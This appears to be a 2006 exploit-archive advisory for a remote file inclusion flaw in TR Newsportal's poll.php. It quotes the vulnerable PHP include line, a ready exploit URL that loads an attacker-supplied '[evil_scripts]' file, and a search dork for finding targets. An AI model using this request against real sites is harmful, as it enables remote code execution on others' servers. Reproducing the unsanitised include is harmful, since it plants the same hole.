TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability

2006-05-15 00:00:00

################ DEVIL TEAM THE BEST POLISH TEAM #################
#TR Newsportal - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: [email protected] or http://www.devilteam.yum.pl
#dork: "TR Newsportal" brought by TRanx.
##################################################################
extras/poll/poll.php:
[code]
<?
include("$file_newsportal");
$ns=OpenNNTPconnection($server,$port);
flush();
if ($ns != false) {
$headers = readOverview($ns,$group,1,true);
closeNNTPconnection($ns);
}
?>
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=[evil_scripts]


###################################################################
#Elo ;-)

#

Fixes

No fixes

In order to submit a new fix you need to be registered.